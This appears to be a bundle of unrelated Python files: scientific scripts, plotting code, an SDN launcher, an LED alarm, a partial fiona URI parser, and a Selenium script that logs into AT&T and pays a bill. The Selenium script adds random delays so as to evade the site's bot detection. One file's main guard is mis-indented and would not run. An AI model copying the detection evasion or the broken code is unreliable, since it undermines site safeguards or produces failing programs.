    # Build a real data structure and serialize it once. The original
    # concatenated a JSON-ish string and then json.dumps'd that string,
    # producing a double-encoded (quoted) string instead of a JSON object.
    files = [key.name for key in bucket.list('lyc')]
    return json.dumps({'files': files})
bottle.run(host='0.0.0.0',port=8888,debug=True) |
__author__ = "Navratan Bagwan"
import all_stats
import pdb
import numpy
import os
import glob
def ptmClassifier(listofpaths, sigmafIle, Outfilename):
    """Cluster 'Orphan' PSM rows into delta-mass classes and append results.

    Reads AllWithSequence-massTag.txt found next to *listofpaths*, splits
    rows into Orphan / non-Orphan using column 23, sorts Orphan rows by
    calibrated delta-MH (column 20) and starts a new class whenever the
    ppm gap to the previous row exceeds the sigma value read from
    *sigmafIle*. Each class gets a representative mass (the median of its
    members, via all_stats.check) and everything is appended to
    <outpath>/<Outfilename>.
    """
    print (sigmafIle)
    #sigmaValue = float(all_stats.sigmaFinder(sigmafIle))
    outpath = os.path.dirname(listofpaths)
    assignationFile = glob.glob(os.path.join(outpath, "AllWithSequence-massTag.txt"))
    sigmafilePath = glob.glob(os.path.join(outpath, str(sigmafIle)))
    print (sigmafilePath)
    # ppm threshold that decides where one delta-mass class ends.
    sigmaValue = float(all_stats.sigmaFinder(sigmafilePath[0]))
    tag = outpath + "/" + Outfilename
    tagFile = open(tag, "a")
    # Output header. It is joined with "" below, so the embedded "\t" items
    # act as separators. NOTE(review): '"CorXcor" "\t"' relies on implicit
    # string concatenation (missing comma) -- harmless given the "" join.
    header = ["Scan", "\t", "SearchEngineRank", "\t", "Charge", "\t", "Exp Mh", "\t", "Theo mh+", "\t", "Exp MZ", "\t", "Xcor", "\t",
              "Seq", "\t", "RetentionTIme", "\t", "Protein", "\t", "Delta_MOD" ,"\t", "B_series","\t", "Y_series", "\t", "Jumps", "\t",
              "DeltaPeptide", "\t", "FileName", "\t", "CorXcor" "\t", "New_expMH", "\t", "label", "\t",
              "median", "\t", "Calibrated Delta MH", "\t", "Calibrated Delta MZ","\t", "Calibrated EXP MZ","\t", "Tags", "\t",
              "fastaDescription", "\t", "seq_mass", "\t", "PeakApex/Dmass", "\t", "DeltaPeptide", "\t", "PPMerror Orphancalss",
              "\t", "ClassNumber", "\t", "Apex/OrphanClassMass", "\t", "FinalSeq", "\n"]
    tagFile.writelines("".join(header))
    mainList = []
    finalList = []
    nonOrphanList = []
    # for everypath in listofpaths:
    #     filename = everypath + "/" + "NotassignedSequences.txt"
    # Split input rows: Orphans (to be clustered) vs everything else.
    with open(assignationFile[0]) as unassignedFile:
        next(unassignedFile)
        for line in unassignedFile:
            if line != "\n":
                splits = line.split("\t")
                calibratedDelta_MH = splits[20].strip()
                if splits[23].strip() == "Orphan":
                    # Keep the numeric delta-MH alongside the raw line for sorting.
                    mainList.append([outpath + "\t" + line.strip() + "\t", float(calibratedDelta_MH.strip())])
                else:
                    nonOrphanList.append([outpath + "\t" + line.strip()])
    # print len(mainList)
    # print len(nonOrphanList)
    # Non-orphan rows are written through with NA placeholders for the
    # class columns.
    for notOrphan in nonOrphanList:
        lineToadd = "\t".join(notOrphan[0].split("\t")[1:]) + "\t" + "NA" + "\t" + "NA" + "\t" + str(notOrphan[0].split("\t")[27]) + "\t" + str(notOrphan[0].split("\t")[28]) + "\n"
        tagFile.writelines(lineToadd)
    # Sort orphans by delta-MH, then compute the ppm gap to the previous row.
    mainList.sort(key=lambda x: x[1])
    for index in range(len(mainList)):
        m1 = mainList[index][1]
        if index == 0:
            m0 = 0
        else:
            m0 = mainList[index - 1][1]
        try:
            ppmError = abs((m0 - m1) / m0) * 1000000
        except ZeroDivisionError:
            ppmError = 0.0
        finalList.append([mainList[index][0], str(ppmError)])
    # Assign class numbers: a gap larger than sigmaValue starts a new class.
    classList = []
    for index1 in range(len(finalList)):
        if index1 == 0:
            classificationTerm = 1
            classList.append([finalList[index1][0] + finalList[index1][1], str(classificationTerm)])
        else:
            if float(finalList[index1][1]) <= sigmaValue:
                classificationTerm = classificationTerm
                classList.append([finalList[index1][0] + finalList[index1][1], str(classificationTerm)])
            else:
                classificationTerm = classificationTerm + 1
                classList.append([finalList[index1][0] + finalList[index1][1], str(classificationTerm)])
    # Per class, collect member masses (column 21) and derive one
    # representative value (single member, or the median for 2+).
    classDic = {}
    for classes in classList:
        if classes[1].strip() not in classDic:
            classDic[classes[1].strip()] = [float(classes[0].split("\t")[21])]
        else:
            classDic[classes[1].strip()].append(float(classes[0].split("\t")[21]))
    for dikey in classDic:
        medianValuelist = classDic[dikey]
        if len(medianValuelist) < 2:
            massOfOrphan = medianValuelist[0]
            # intformula = int(massOfOrphan / float(binvalue)) * float(binvalue) + float(binvalue) / 2
            orphanPTM = all_stats.check(massOfOrphan, 6)
            classDic[dikey].append(orphanPTM)
        else:
            massOfOrphan = numpy.median(medianValuelist)
            # intformula = int(massOfOrphan / float(binvalue)) * float(binvalue) + float(binvalue) / 2
            orphanPTM = all_stats.check(massOfOrphan, 6)
            classDic[dikey].append(orphanPTM)
    # Attach the class's representative PTM mass and the Orphan label to
    # every member row.
    for appendingPTMinList in classList:
        if appendingPTMinList[1] in classDic:
            ptmINT = classDic[appendingPTMinList[1]][1:][0]
            appendingPTMinList.append(all_stats.check(float(ptmINT),6))
            appendingPTMinList.append("Orphan")
    # Group rows by their originating path prefix before writing.
    DicTomergeFiles = {}
    for ii in classList:
        PathTO_ptmFile = ii[0].split("\t")[0]
        if PathTO_ptmFile not in DicTomergeFiles:
            DicTomergeFiles[PathTO_ptmFile] = [ii]
        else:
            DicTomergeFiles[PathTO_ptmFile].append(ii)
    for pathInDic in DicTomergeFiles:
        if pathInDic in outpath:
            # tag = pathInDic + "/" + "ClassTest_AllWithSequence-massTag.txt"
            # tagFile = open(tag, "a")
            for linestring in DicTomergeFiles[pathInDic]:
                deltaPeptide = linestring[0].split("\t")[15]
                if deltaPeptide.isalpha():
                    # No modification bracket in the sequence; keep as-is.
                    finalSeqMassTag = deltaPeptide
                else:
                    # Replace the [mass] annotation in the peptide with the
                    # class's representative mass, 6-decimal formatted.
                    for index in range(0, len(deltaPeptide)):
                        if deltaPeptide[index] == "[":
                            startofMOD = index
                        if deltaPeptide[index] == "]":
                            endofMOD = index
                    tempPepe = deltaPeptide[startofMOD + 1:endofMOD]
                    newclose = all_stats.check(float(linestring[2]), 6)
                    finalSeqMassTag = deltaPeptide.replace(tempPepe, str("{:.6f}".format(float(newclose))))
                lineToadd = "\t".join(linestring[0].split("\t")[1:]) + "\t" + str(linestring[1]) + "\t" + str(linestring[2]) + "\t" + finalSeqMassTag + "\n"
                tagFile.writelines(lineToadd)
    tagFile.close()
# def callCallisifer(listoffiles, sigmafiles):
# pdb.set_trace()
# calssifierFucntion = partial(ptmClassifier, sigmafile=sigmafiles)
# with concurrent.futures.ProcessPoolExecutor() as executor:
# executor.map(calssifierFucntion, listoffiles)
|
__author__ = 'ardila'
import numpy as np
def feature_split_large(n_features, n_samples, n_bootstrap):
    """
    Generate index subsets that subsample features of size n_features:
    take a linear space of n_samples sizes from n_features/2 up to
    n_features, and resample each size n_bootstrap times.

    Returns a list of n_samples * n_bootstrap lists of feature indexes.
    """
    assert n_samples <= n_features / 2
    # Sizes must be ints: the original sliced with floats from linspace and
    # used a Python 2 print statement, both of which fail on Python 3.
    sizes = [int(size) for size in np.linspace(np.ceil(n_features / 2.), n_features, n_samples)]
    all_inds = np.arange(n_features)
    rng = np.random.RandomState(0)
    inds = []
    print(sizes)
    for _ in range(n_bootstrap):
        for size in sizes:
            rng.shuffle(all_inds)
            inds.append(list(all_inds[:size]))
    return inds
def feature_split(n_features, n_samples, n_bootstrap, max_samples_per_size):
    """
    Select indexes up to n_features without replacement or overlap.

    :param n_features: number of features to select from
    :param n_samples: number of distinctly sized sample selections (2 at a time, 3 at a time... etc)
    :param n_bootstrap: number of times to shuffle and reselect per size
    :param max_samples_per_size: maximum number of chunks to take per distinct size
    """
    feature_splits = []
    # The least you can take is 2
    min_features = 2
    # The most you can take without replacement or overlap is n_features/2
    max_features = n_features // 2
    # Therefore this is the max amount of distinct sizes of samples to take
    max_n_samples = max_features - min_features + 1
    n_samples = min(max_n_samples, n_samples)
    chunk_sizes = [int(size) for size in np.round(np.linspace(min_features, max_features, n_samples))]
    # Must be a list: on Python 3, range() is immutable and rng.shuffle fails.
    all_inds = list(range(n_features))
    rng = np.random.RandomState(0)
    for chunk_size in chunk_sizes:
        # Floor division -- true division yields a float, which breaks
        # range() on Python 3.
        n_chunks = n_features // chunk_size
        n_chunks = min(max_samples_per_size, n_chunks)
        for _ in range(n_bootstrap):
            rng.shuffle(all_inds)
            for chunk_ind in range(0, n_chunks):
                feature_splits.append(all_inds[chunk_ind * chunk_size:(chunk_ind + 1) * chunk_size])
    return feature_splits
|
#!/usr/bin/env python
import math
import random
import shutil
import subprocess
import tempfile
import time
from os import getcwd
from pathlib import Path
from sys import exit
from pydub import AudioSegment
MUSIC_DIR = Path("/home/kajm/media/music") # change to directory with mp3 files
MP3_FILES = list(MUSIC_DIR.glob("**/*.mp3")) # glob for finding mp3files
TEST_DATA = random.sample(MP3_FILES, 10) # 10 is the number of songs to test out
def calculate_fingerprint(path):
    """Compute the raw audio fingerprint of a file as a list of ints.

    Invokes the external ``fpcalc`` tool and parses its comma-separated
    output. If parsing fails, the offending file is copied into the
    current working directory for inspection and None is returned.
    """
    try:
        command = ["fpcalc", "-raw", "-plain", path]
        with subprocess.Popen(command, stdout=subprocess.PIPE, text=True) as proc:
            raw_output = proc.stdout.read()
        return [int(value) for value in raw_output.split(",")]
    except ValueError:
        # Keep a copy of the file whose fingerprint could not be parsed.
        shutil.copy(path, getcwd())
        return None
def create_duration_samples(path, dest_dir):
    """
    Create 5 random samples from a given song. Both the position each
    sample starts at (0-60 s) and its duration (5-20 s) are randomized.
    Each snippet is exported to dest_dir; returns a list of
    ((duration, start), snippet_path) tuples.
    """
    song = AudioSegment.from_mp3(path)
    samples = [random.randint(5, 20) for _ in range(5)]
    song_name = path.stem
    snippets = []
    for i in samples:
        start = random.randint(0, 60)
        # pydub slices are indexed in milliseconds.
        snippet = song[start * 1000: (i + start) * 1000]
        snippet_path = dest_dir / (song_name + f"_{i}_{start}s" + path.suffix)
        snippet.export(snippet_path)
        snippets.append(((i, start), snippet_path))
    return snippets
def make_slices(same_positions, limit):
    """
    Merge runs of consecutive positions into inclusive (start, end)
    slices, e.g. [1, 2, 3, 5, 6, 8] becomes [(1, 3), (5, 6), (8, 8)].

    The original pop/IndexError implementation dropped the run being
    merged when the list ended mid-run (e.g. [1, 2] yielded [(2, 2)]
    instead of [(1, 2)]); this index-based version handles that case.
    ``limit`` is kept for backward compatibility and is unused.
    """
    slices = []
    i = 0
    n = len(same_positions)
    while i < n:
        start = same_positions[i]
        # Advance while the next position continues the consecutive run.
        while i + 1 < n and same_positions[i] + 1 == same_positions[i + 1]:
            i += 1
        slices.append((start, same_positions[i]))
        i += 1
    return slices
def find_matching_positions(l1, l2):
    """
    Return parallel index lists for the values l1 and l2 share.

    For each element of l2 that also occurs in l1, record the index of
    its FIRST occurrence in l1 and its index in l2. l2 is assumed to be
    the longer list.
    """
    positions_l1 = []
    positions_l2 = []
    for pos, value in enumerate(l2):
        if value not in l1:
            continue
        positions_l1.append(l1.index(value))
        positions_l2.append(pos)
    return (positions_l1, positions_l2)
def avg_distance(sample, candidate):
    """
    A value of 0 is ideal and means that the sample fingerprint
    is a proper subset of candidate fingerprint. math.inf in our
    case means that there's no way the fingerprints come from the
    same song
    """
    # find positions where the two fingerprints are equal
    sample_positions, candidate_positions = find_matching_positions(
        sample, candidate
    )
    if len(sample_positions) == 0:  # return early since no similar positions
        return math.inf
    all_diffs = []
    # Merge each side's match positions into consecutive runs.
    sample_slices = make_slices(sample_positions, len(sample_positions))
    candidate_slices = make_slices(
        candidate_positions, len(candidate_positions)
    )
    # find slices and compute their differences
    # NOTE(review): zip pairs the runs positionally, implicitly assuming
    # matching runs line up one-to-one between the two lists -- confirm.
    for ((ss, se), (cs, ce)) in zip(sample_slices, candidate_slices):
        if ss == se and cs == ce:
            # Single-position runs: compare the two values directly.
            all_diffs.append(abs(sample[ss] - candidate[cs]))
        else:
            sample_slice = sample[ss : se + 1]
            candidate_slice = candidate[cs : ce + 1]
            diffs = [
                abs(x - y) for (x, y) in zip(sample_slice, candidate_slice)
            ]
            all_diffs.append(
                sum(diffs) / len(diffs)
            )  # average distance between fingerprints in slices
    return sum(all_diffs) / len(all_diffs)  # average of all differences
def compare_single_track(song, tdir, reference, reffp):
    """Fingerprint random snippets of *song* and report their distance to
    the song's own fingerprint and to an unrelated reference fingerprint.

    song -- path to the track under test; tdir -- temp dir for snippets;
    reference/reffp -- the reference track's path and fingerprint.
    """
    title = song.stem
    print("-" * 70)
    print(f"Current: {title:<50s}")
    print("*" * 70)
    print(f"Random Reference: {reference.stem:<50}")
    print("-" * 70)
    orig_fingerprint = calculate_fingerprint(song)
    samples = create_duration_samples(song, Path(tdir))
    if orig_fingerprint is None:
        print(f"Could not calculate fingerprint for track")
        return
    for ((duration, start), sample) in samples:
        s = calculate_fingerprint(sample)
        if s is None:
            print(f"Could not calculate fingerprint for {samples[0][1]}")
            continue
        # Time only the fingerprint comparison, not the fpcalc run.
        start_time = time.process_time()
        dist = avg_distance(s, orig_fingerprint)
        dur = time.process_time() - start_time
        print(f"Fingerprint comparison completed in {dur:.8f}s")
        ref_dist = avg_distance(s, reffp)
        print(
            f"Sample starting {start}s to {start + duration}s\n"
            f"Distance to candidate {dist:.2f}\n"
            f"Distance to reference {ref_dist:.2f}\n"
        )
def main():
    """Pick one random reference track, then compare every test track's
    random snippets against both its own fingerprint and the reference."""
    # Removed the original's unused `track = random.choice(TEST_DATA)`:
    # it was immediately shadowed by the loop variable below.
    random_reference = random.choice(TEST_DATA)
    ref = calculate_fingerprint(random_reference)
    if not ref:
        print("Could not calculate fingerprint for reference")
        exit(1)
    with tempfile.TemporaryDirectory() as tdir:
        for track in TEST_DATA:
            compare_single_track(track, tdir, random_reference, ref)
if __name__ == "__main__":
main()
|
from energydiagram import ED
# NOTE(review): PdfPages is imported but never used here.
from matplotlib.backends.backend_pdf import PdfPages
# Energy-level diagram comparing C3/C4/C5 unrelaxed vs relaxed states
# against the closed-shell molecule (values presumably total energies
# in hartree -- TODO confirm units).
diagram = ED()
diagram.add_level(-646.499346248,'Closed Shell Molecule')
diagram.add_level(-645.842343146,'C3 unrelaxed')
# 'last' stacks the level in the same column as the previous one.
diagram.add_level(-645.852575856,'C4 unrelaxed','last')
diagram.add_level(-645.852440887,'C5 unrelaxed','last')
diagram.add_level(-645.866923481,'C3 relaxed',)
diagram.add_level(-645.868512298,'C4 relaxed','last')
diagram.add_level(-645.866256558,'C5 relaxed','last')
# Connect the closed-shell reference to each unrelaxed state, and each
# unrelaxed state to its relaxed counterpart.
diagram.add_link(0,1)
diagram.add_link(0,2)
diagram.add_link(0,3)
diagram.add_link(1,4)
diagram.add_link(2,5)
diagram.add_link(3,6)
diagram.plot(show_IDs=True)
my_fig = diagram.fig
|
import plotly
import plotly.graph_objs as go
import numpy as np
import colour
# D65 white point under the CIE 1931 2-degree standard observer.
d65 = colour.ILLUMINANTS['CIE 1931 2 Degree Standard Observer']['D65']
def sRGB2Lab(rgb):
    """Convert an sRGB triplet in [0, 255] to CIE Lab (D65 white point)."""
    return colour.XYZ_to_Lab(colour.sRGB_to_XYZ(rgb / 255, illuminant=d65), illuminant=d65)
# Plot the sRGB gamut boundary in Lab space: sample the RGB cube on a
# gridN^3 grid, convert to Lab, and render the six cube faces as
# vertex-colored meshes with a wireframe overlay.
gridN = 9
# Grid over [0, 255] with both endpoints included.
grid = np.linspace(0,256,gridN,True) - 1
grid[0] = 0
rr, gg, bb = np.meshgrid(grid,grid,grid,indexing="ij")
rgb = np.stack((rr,gg,bb), axis=3)
# Boolean masks selecting the six faces of the RGB cube.
ind_Xp = rgb[:,:,:,0]==255
ind_Xm = rgb[:,:,:,0]==0
ind_Yp = rgb[:,:,:,1]==255
ind_Ym = rgb[:,:,:,1]==0
ind_Zp = rgb[:,:,:,2]==255
ind_Zm = rgb[:,:,:,2]==0
print("convert sRGB to Lab")
lab = np.apply_along_axis(sRGB2Lab, 3, rgb)
print("extract faces")
# NOTE(review): vZp/cZp are built from ind_Zm and vZm/cZm from ind_Zp.
# The swap is applied consistently to both vertices and colors, so the
# rendered mesh is still self-consistent -- confirm the naming is intended.
vXp = lab[ind_Xp].reshape((-1,3))
vXm = lab[ind_Xm].reshape((-1,3))
vYp = lab[ind_Yp].reshape((-1,3))
vYm = lab[ind_Ym].reshape((-1,3))
vZp = lab[ind_Zm].reshape((-1,3))
vZm = lab[ind_Zp].reshape((-1,3))
cXp = rgb[ind_Xp].reshape((-1,3))
cXm = rgb[ind_Xm].reshape((-1,3))
cYp = rgb[ind_Yp].reshape((-1,3))
cYm = rgb[ind_Ym].reshape((-1,3))
cZp = rgb[ind_Zm].reshape((-1,3))
cZm = rgb[ind_Zp].reshape((-1,3))
# Two triangles per grid cell, indices into a gridN x gridN vertex grid.
faces = []
for i in range(gridN-1):
    for j in range(gridN-1):
        faces.append([i*gridN + j, (i+1)*gridN + j, i*gridN + (j+1)])
        faces.append([(i+1)*gridN + j, (i+1)*gridN + (j+1), i*gridN + (j+1)])
faces = np.array(faces, dtype=int)
v_planes = [vXp, vXm, vYp, vYm, vZp, vZm]
c_planes = [cXp, cXm, cYp, cYm, cZp, cZm]
data = []
for v,c in zip(v_planes,c_planes):
    # Wireframe segments between grid neighbors; [None]*3 breaks the line.
    edge = []
    for i in range(gridN):
        for j in range(gridN):
            if i < gridN-1:
                edge += [v[i*gridN+j], v[(i+1)*gridN + j], [None]*3]
            if j < gridN-1:
                edge += [v[i*gridN+j], v[i*gridN + (j+1)], [None]*3]
    edge = np.array(edge)
    # Axes: plot x = a (Lab column 1), y = b (column 2), z = L (column 0).
    go_edge = go.Scatter3d(
        x = edge[:,1],
        y = edge[:,2],
        z = edge[:,0],
        mode="lines",
        line=go.scatter3d.Line(color=('rgb(100,100,100)'))
    )
    go_mesh = go.Mesh3d(
        x = v[:,1],
        y = v[:,2],
        z = v[:,0],
        i = faces[:,0],
        j = faces[:,1],
        k = faces[:,2],
        vertexcolor=c,
        # Flat shading: ambient only, so vertex colors show unmodified.
        lighting = dict(
            ambient=1,
            diffuse=0,
            specular=0,
            roughness=0,
            fresnel=0
        )
    )
    data.append(go_mesh)
    data.append(go_edge)
# Axis ranges match Lab's a/b (approx. +/-127) and L (0-100) domains.
layout = go.Layout(
    scene = dict (
        xaxis = dict (
            range = [-127,127]
        ),
        yaxis = dict(
            range = [-127,127]
        ),
        zaxis = dict(
            range = [0,100]
        )
    )
)
fig = go.Figure(data=data, layout=layout)
print("plot")
plotly.offline.plot(fig)
#! /usr/bin/env python
# Thin launcher: boots the POX SDN controller from a local checkout.
if __name__ == '__main__':
    import sys
    # Make the local POX checkout importable before loading pox.boot.
    sys.path.insert(0, '/home/mininet/pox')
    import pox.boot
    pox.boot.boot()
import logging
import random
import time
from selenium import common
from selenium.common.exceptions import TimeoutException
from selenium.webdriver.common.by import By
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.support import expected_conditions
from selenium.webdriver.support.wait import WebDriverWait
import utils
from result import Result
LOGGER = logging.getLogger('debbit')
# Written by reddit user reddit.com/u/jonnno_
def web_automation(driver, merchant, amount):
    """Log in to att.com if needed, then submit a payment of *amount* cents
    using the saved payment method named merchant.card.

    Returns a Result value: success, skipped (duplicate amount within
    24h), or unverified (submitted but confirmation not observed).
    """
    driver.get('https://www.att.com/my/#/passthrough/overview')
    # Wait until login screen, promotion pop-up, or account dashboard shows.
    WebDriverWait(driver, 120).until(utils.AnyExpectedCondition(
        expected_conditions.element_to_be_clickable((By.NAME, "password")),  # logged out
        expected_conditions.element_to_be_clickable((By.XPATH, "//*[contains(@id,'ancel')]")),  # mfa flow identified by cancel button
        expected_conditions.element_to_be_clickable((By.XPATH, "//img[contains(@src,'btnNoThanks')]")),  # logged in
        expected_conditions.element_to_be_clickable((By.XPATH, "//button[contains(text(),'Make a payment')]"))  # logged in
    ))
    handle_mfa_code_flow(driver)
    time.sleep(1 + random.random() * 2)  # AT&T is using bot detection software, slow down the automation a bit to help avoid detection
    if driver.find_elements_by_name('password'):  # password field found, need to log in
        try:
            driver.find_element_by_id('userID').send_keys(merchant.usr)
            time.sleep(1 + random.random() * 2)
        except common.exceptions.NoSuchElementException:
            # Username may already be pre-filled; only the password is needed.
            pass
        driver.find_element_by_name('password').send_keys(merchant.psw)
        time.sleep(1 + random.random() * 2)
        driver.find_element_by_xpath("//button[contains(text(),'Sign in')]").click()
        try:
            # Wait for potential promotions screen, regular account overview, or OTP flow
            WebDriverWait(driver, 120).until(utils.AnyExpectedCondition(
                expected_conditions.element_to_be_clickable((By.XPATH, "//img[contains(@src,'btnNoThanks')]")),
                expected_conditions.element_to_be_clickable((By.XPATH, "//button[contains(text(),'Make a payment')]")),
                expected_conditions.element_to_be_clickable((By.XPATH, "//*[contains(@id,'ancel')]"))  # mfa flow identified by cancel button
            ))
        except TimeoutException:
            pass  # Try continuing to the makePayment page just in case log in worked, but timeout failed
        time.sleep(1 + random.random() * 2)
        handle_mfa_code_flow(driver)
    driver.get("https://www.att.com/my/#/makePayment")
    # Enter amount and select payment card
    WebDriverWait(driver, 20).until(expected_conditions.element_to_be_clickable((By.ID, "pmtAmount0")))
    time.sleep(1 + random.random() * 2)
    elem = driver.find_element_by_id('pmtAmount0')
    elem.clear()
    time.sleep(1 + random.random() * 2)
    elem.send_keys(utils.cents_to_str(amount))
    time.sleep(1 + random.random() * 2)
    elem = driver.find_element_by_id("paymentMethod0")
    # The dropdown is navigated with arrow keys: first scroll to the top
    # sentinel entry, then step down until the target card (or the bottom
    # sentinel) is selected.
    before_first_payment_card = "Select Payment Method"
    after_last_payment_card = "New checking / savings account"
    while elem.get_attribute("value").lower() != before_first_payment_card.lower():
        elem.send_keys(Keys.UP)
        time.sleep(1 + random.random())
    while elem.get_attribute("value").lower() != merchant.card.lower() and elem.get_attribute("value").lower() != after_last_payment_card.lower():
        elem.send_keys(Keys.DOWN)
        time.sleep(1 + random.random())
    if elem.get_attribute("value").lower() == after_last_payment_card.lower():
        raise Exception("Payment method " + merchant.card + " not found in list of saved payment methods")
    # Continue
    elem.send_keys(Keys.ENTER)
    time.sleep(1 + random.random() * 2)
    try:
        # Dismiss the "paying more than the amount due" confirmation modal if shown.
        WebDriverWait(driver, 20).until(expected_conditions.presence_of_element_located((By.XPATH, "//html/body/div[contains(@class,'modalwrapper active')]//p[contains(text(),'paying more than the amount due')]")))
        driver.find_element_by_xpath("//html/body/div[contains(@class,'modalwrapper active')]//button[text()='OK']").click()
        time.sleep(1 + random.random() * 2)
    except TimeoutException:
        pass
    # Submit
    WebDriverWait(driver, 20).until(expected_conditions.element_to_be_clickable((By.XPATH, "//button[text()='Submit']")))
    WebDriverWait(driver, 20).until(expected_conditions.invisibility_of_element_located((By.ID, "loaderOverlay")))
    time.sleep(2 + random.random())
    driver.find_element_by_xpath("//button[text()='Submit']").click()
    try:
        WebDriverWait(driver, 120).until(utils.AnyExpectedCondition(
            expected_conditions.presence_of_element_located((By.XPATH, "//*[contains(text(),'Thank you for your payment')]")),
            expected_conditions.presence_of_element_located((By.XPATH, "//*[contains(text(),'payment was unsuccessful')]"))
        ))
        if driver.find_elements_by_xpath("//*[contains(text(),'multiple payments')]"):
            return Result.skipped  # att does not allow payments of the same dollar amount within 24 hours, skip this purchase and try again 24 hours later
        elif driver.find_elements_by_xpath("//*[text()='$" + utils.cents_to_str(amount) + "']"):
            return Result.success
        else:
            return Result.unverified
    except (KeyboardInterrupt, SystemExit):
        raise
    except Exception:
        return Result.unverified  # Purchase command was executed, yet we are unable to verify that it was successfully executed.
        # since debbit may have spent money but isn't sure, we log the error and stop any further payments for this merchant until the user intervenes
    # NOTE(review): every path through the try/except above returns or
    # raises, so this final return appears unreachable.
    return Result.success
def handle_mfa_code_flow(driver):
    """Walk the bank site's one-time multi-factor-auth flow, if present.

    Detects the MFA page by the presence of the 'submitDest' element; if
    found, optionally asks the user to pick an MFA delivery option, sends
    the code, prompts the user for the OTP on stdin, and submits it.
    Failures are deliberately swallowed so a user clicking around the UI
    does not crash the run.
    """
    if driver.find_elements_by_id('submitDest'): # MFA flow
        LOGGER.info('One time multi-factor auth required. This will not happen after the first debbit run.')
        try:
            multi_mfa_options = False
            try:
                # Zero-second wait: just probe whether the Send button is
                # immediately clickable.
                WebDriverWait(driver, 0).until(expected_conditions.element_to_be_clickable((By.ID, "submitDest")))
            except TimeoutException:  # The Send code button is not clickable. This means there are multiple MFA options. Ask user which one to use.
                multi_mfa_options = True
            if multi_mfa_options:
                # Radio options are labelled m1label..m9label on the page.
                mfa_options = {}
                for i in range(1, 10):
                    if driver.find_elements_by_id('m' + str(i) + 'label'):
                        mfa_options[i] = driver.find_element_by_id('m' + str(i) + 'label').text
                LOGGER.info('')
                LOGGER.info('Choose a multi-factor authentication option.')
                for k, v in mfa_options.items():
                    LOGGER.info('  ' + str(k) + ' - ' + v)
                LOGGER.info('Type a number 1-9 and then hit enter: ')
                user_mfa_choice_input = input()  # TODO put timeout around this
                user_mfa_choice_index = ''.join([c for c in user_mfa_choice_input if c.isdigit()])  # sanitize input to remove all non digit characters
                driver.find_element_by_id('m' + user_mfa_choice_index + 'label').click()
                time.sleep(1 + random.random() * 2)
            time.sleep(1 + random.random() * 2)
            # Request the one-time code.
            driver.find_element_by_id("submitDest").click()
            WebDriverWait(driver, 20).until(expected_conditions.element_to_be_clickable((By.ID, "codeValue")))
            LOGGER.info('Enter OTP here: ')
            otp = input()  # TODO put timeout around this
            elem = driver.find_element_by_id("codeValue")
            elem.send_keys(otp)
            time.sleep(1 + random.random() * 2)
            driver.find_element_by_xpath("//*[contains(@id,'ubmit')]").click()  # submit or Submit button
            # Wait until either the post-login nag or the payment page appears.
            WebDriverWait(driver, 120).until(utils.AnyExpectedCondition(
                expected_conditions.element_to_be_clickable((By.XPATH, "//img[contains(@src,'btnNoThanks')]")),
                expected_conditions.element_to_be_clickable((By.XPATH, "//button[contains(text(),'Make a payment')]"))
            ))
        except (KeyboardInterrupt, SystemExit):
            raise
        except Exception:
            pass  # User may have intervened by clicking around in the UI, allow failures to be ignored
|
#!/usr/bin/python
# makes a LPD8806 LED strip mimic a sunrise as an alarm clock
# uses the https://github.com/adammhaile/RPi-LPD8806 project for led helpers
import sys
sys.path.insert(0, './vendor/led-strip/RPi-LPD8806')
from bootstrap import *
# setup colors to loop through for fade
# colors use cls.cc standards (presumably "clrs.cc" color names -- confirm)
colors = [
    (255.0,65.0,54.0), # red
    (255.0,133.0,27.0), # orange
    (255.0,220.0,0.0), # yellow
    (255.0,254.0,254.0)
]
# Start dim and ramp toward full brightness across the color steps,
# one 0.01 increment per second.
brightness = 0.2
brightness_per_step = 0.99 / len(colors)
for step in range(len(colors)):
    r, g, b = colors[step]
    # Per-step brightness ceiling grows linearly with the step index.
    brightness_max_this_step = brightness_per_step * ( step + 1 )
    if brightness >= 0.9: # hard brightness limit on led strip
        led.fill(Color(r, g, b, 0.99))
        led.update()
    else:
        # Fade up to this step's ceiling, 1% per second.
        while brightness < brightness_max_this_step:
            led.fill(Color(r, g, b, brightness))
            led.update()
            sleep(1)
            brightness += 0.01
    # Hold the current color before moving to the next.
    sleep(5)
# Keep the "sunrise" lit for 30 minutes, then switch everything off.
sleep(1800)
led.all_off()
|
"""Implementation of Apache VFS schemes and URLs."""
import os
import sys
import re
from fiona.compat import urlparse
# Supported URI schemes and their mapping to GDAL's VSI suffix.
# TODO: extend for other cloud platforms.
SCHEMES = {
    'ftp': 'curl',
    'gzip': 'gzip',
    'http': 'curl',
    'https': 'curl',
    's3': 's3',
    'tar': 'tar',
    'zip': 'zip',
    'gs': 'gs',
}
# Schemes served through GDAL's generic /vsicurl/ handler.
CURLSCHEMES = set([k for k, v in SCHEMES.items() if v == 'curl'])
# Schemes that address remote (network) resources rather than local files.
# TODO: extend for other cloud platforms.
REMOTESCHEMES = set([k for k, v in SCHEMES.items() if v in ('curl', 's3', 'gs')])
def valid_vsi(vsi):
    """Ensure every '+'-separated part of *vsi* is a supported scheme."""
    for part in vsi.split('+'):
        if part not in SCHEMES:
            return False
    return True
def is_remote(scheme):
    """Return True when any part of *scheme* (e.g. 'zip+https') is remote."""
    if scheme is None:
        return False
    for part in scheme.split('+'):
        if part in REMOTESCHEMES:
            return True
    return False
def vsi_path(path, vsi=None, archive=None):
    """Build an OGR VSI path (see cpl_vsi.h) from *path*.

    When *vsi* is given, each '+'-separated scheme is mapped to its GDAL
    'vsiXXX' prefix; *archive* (if any) is inserted between the prefix and
    the inner path. Without *vsi*, *path* is returned unchanged.
    """
    if not vsi:
        return path
    suffixes = ['vsi{0}'.format(SCHEMES[p]) for p in vsi.split('+')]
    prefix = '/'.join(suffixes)
    if archive:
        return '/{0}/{1}{2}'.format(prefix, archive, path)
    return '/{0}/{1}'.format(prefix, path)
def parse_paths(uri, vfs=None):
    """Parse a URI or Apache VFS URL into its parts.

    Parameters
    ----------
    uri : str
        Filesystem path, URI, or scheme-chained URL (e.g. "zip+https://...").
    vfs : str, optional
        Legacy Apache-style VFS URL naming the enclosing archive.

    Returns
    -------
    tuple
        (path, scheme, archive)
    """
    archive = scheme = None
    path = uri
    # Windows drive letters (e.g. "C:\") confuse `urlparse` as they look like
    # URL schemes
    if sys.platform == "win32" and re.match("^[a-zA-Z]\\:", path):
        return path, None, None
    if vfs:
        # Archive and scheme come from the VFS URL; `uri` is the inner path.
        parts = urlparse(vfs)
        scheme = parts.scheme
        archive = parts.path
        if parts.netloc and parts.netloc != 'localhost':
